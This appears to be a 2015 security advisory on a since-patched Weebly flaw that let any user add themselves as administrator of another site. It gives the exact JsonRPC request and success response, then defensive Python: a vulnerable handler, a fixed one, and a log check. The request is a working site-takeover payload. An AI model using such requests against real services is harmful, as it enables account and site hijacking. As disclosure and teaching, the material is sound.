Date: Sat, 11 Apr 2015 20:04:20 GMT
Subject: Hijacking any Weebly Website [Insecure Direct Object Reference

Title: Hijack any website by just adding an administrator to it. [Insecure Direct Object Reference Vulnerability]


Weebly is a web-hosting service that allows the user to "drag-and-drop" while using their website builder. As of August 2012, Weebly hosts over 20 million sites with a monthly rate of over 1 million unique visitors.


Any Weebly website owner can hijack any other Weebly website by simply inviting himself/herself through email and modifying the site ID in the HTTP request.




Here's the website details of the target:

weebly site:
owner_id: 47812623
site_id: 367503762921888574


HTTP Request:

POST /api/JsonRPC/Editor/ HTTP/1.1

{"jsonrpc":"2.0","method":"Contributor::createMultiple","params":[{"role":"admin","email":"","message":"HiJacking Weebly websites","restrict_pages":false,"owner_id":"47812623","site_id":"367503762921888574"}],"id":0}


HTTP Response:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26

{"jsonrpc":"2.0","id":0,"method":"Contributor::createMultiple","result":{"success":true,"models":[{"id":"invitation-596276730608950492","pending":true,"owner_id":"47812623","user_id":null,"site_id":"367503762921888574","email":"","last_login":false,"role":"admin","display_role":"Administrator","invitation_id":"596276730608950492","invitation_used":null,"invitation_retracted":null,"message":"HiJacking Weebly websites","restrict_pages":false,"allowed_pages":[],"allow_publish":true,"allow_stats":true,"allow_form_entries":true,"allow_blog_comments":true}],"errors":[]}}
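The exchange above shows the server accepting the site_id and owner_id that the client put in the request body. As an added illustration (not code from the original advisory and not Weebly's implementation), the Python below models a Contributor::createMultiple handler twice: once trusting the client-supplied ids (the IDOR), and once deriving authorization from the server-side session and ignoring the client's owner_id. The site data model, the error code -32000, the non-owner user id 12345678 and the invitee address are constructed for the example; the site_id and owner_id values are the ones from the advisory. A small log-review check is included that flags requests whose owner_id does not match the session user, which is the signal a defender would look for in request logs for this endpoint.

```python
import copy
import json

# Constructed sample data (not Weebly's data model): each site records its
# owner and the contributors already added. The first site uses the ids quoted
# in the advisory; the second is a filler site belonging to someone else.
SITES = {
    "367503762921888574": {"owner_id": "47812623", "contributors": {}},
    "200000000000000002": {"owner_id": "55555555", "contributors": {}},
}

FORBIDDEN = -32000  # application-defined JSON-RPC error code (assumption)
NON_OWNER = "12345678"  # constructed id of a logged-in user who does not own the target site

# Constructed request in the shape of the advisory's POST body; the email is a placeholder.
REQUEST = json.dumps({
    "jsonrpc": "2.0", "method": "Contributor::createMultiple",
    "params": [{"role": "admin", "email": "invitee@example.invalid",
                "message": "HiJacking Weebly websites", "restrict_pages": False,
                "owner_id": "47812623", "site_id": "367503762921888574"}],
    "id": 0,
})


def _fresh_sites():
    """Deep copy so each call starts from the same state."""
    return copy.deepcopy(SITES)


def _invite(params, site_id):
    return {"email": params["email"], "role": params.get("role", "editor"),
            "site_id": site_id, "pending": True, "user_id": None}


def create_contributors_vulnerable(session_user_id, request_json, sites):
    """Vulnerable handler: the site to modify is chosen purely by the client's
    site_id, and session_user_id is never compared against the site's owner."""
    req = json.loads(request_json)
    p = req["params"][0]
    site = sites[p["site_id"]]  # no ownership check: this is the IDOR
    invite = _invite(p, p["site_id"])
    invite["owner_id"] = p["owner_id"]  # trusted straight from the client
    site["contributors"][p["email"]] = invite
    return {"jsonrpc": "2.0", "id": req["id"],
            "result": {"success": True, "models": [invite], "errors": []}}


def can_manage_contributors(user_id, site):
    """Only the site owner, or an existing admin contributor, may add contributors."""
    if user_id == site["owner_id"]:
        return True
    return any(c.get("user_id") == user_id and c["role"] == "admin"
               for c in site["contributors"].values())


def create_contributors_fixed(session_user_id, request_json, sites):
    """Hardened handler: authorization comes from the server-side session, and the
    client-supplied owner_id is ignored in favour of the stored owner."""
    req = json.loads(request_json)
    p = req["params"][0]
    site = sites.get(p["site_id"])
    if site is None or not can_manage_contributors(session_user_id, site):
        # Identical response for "no such site" and "not your site", so the
        # endpoint does not confirm which site ids exist.
        return {"jsonrpc": "2.0", "id": req["id"],
                "error": {"code": FORBIDDEN, "message": "Forbidden"}}
    invite = _invite(p, p["site_id"])
    invite["owner_id"] = site["owner_id"]  # server-side value, not p["owner_id"]
    site["contributors"][p["email"]] = invite
    return {"jsonrpc": "2.0", "id": req["id"],
            "result": {"success": True, "models": [invite], "errors": []}}


def owner_mismatch(session_user_id, request_json):
    """Log-review check: True when the owner_id a client sent is not the session
    user. A legitimate owner has no reason to submit someone else's owner_id."""
    p = json.loads(request_json)["params"][0]
    return str(p.get("owner_id")) != str(session_user_id)


if __name__ == "__main__":
    s = _fresh_sites()
    print("vulnerable:", create_contributors_vulnerable(NON_OWNER, REQUEST, s)["result"]["success"])
    s = _fresh_sites()
    print("fixed:", create_contributors_fixed(NON_OWNER, REQUEST, s).get("error"))
    print("owner mismatch flagged:", owner_mismatch(NON_OWNER, REQUEST))
```

The fix is not "validate owner_id better": the handler should never consult a client-supplied owner at all. The acting user comes from the session, the owner comes from the stored site record, and the only question is whether the former is allowed to manage the latter.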


Report Timeline:
February 22, 2015 – Bug Found by Allan Jay Dumanhug.
February 26, 2015 – Vendor Response and Vendor Fix/Patch.
